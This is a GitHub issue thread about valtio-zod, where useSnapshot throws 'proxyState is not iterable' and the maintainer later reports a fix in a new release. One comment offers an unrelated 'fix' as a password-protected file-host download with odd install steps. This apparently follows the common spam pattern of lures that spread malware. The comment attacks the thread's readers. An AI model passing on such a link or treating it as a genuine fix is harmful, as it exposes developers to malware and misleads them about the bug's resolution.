### ISSUE TITLE
valtio throws `Uncaught TypeError: proxyState is not iterable` when calling useSnapshot in react with "Please use proxy object" warning

### ISSUE THREAD

**Issue by overthemike** [valtiojs/valtio-zod#3]
The issue, I believe, is that useSnapshot is expecting a valtio proxy but is at some point being sent a valtio-zod proxy instead. The weird thing is, the snapshot seems to update when modifying. My best guess right (now is that it's being passed the wrong value followed by the correct value, but I'm at a loss as to why so far. I thought it might be because I was updating the target using Reflect.set [https://github.com/valtiojs/valtio-zod/blob/main/src/index.ts#L148](https://github.com/valtiojs/valtio-zod/blob/main/src/index.ts#L148), but removing it doesn't change anything. Any ideas?

There's an example of what I'm talking about in `/examples/react`

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by overthemike** [comment]
Fixed with most recent release.
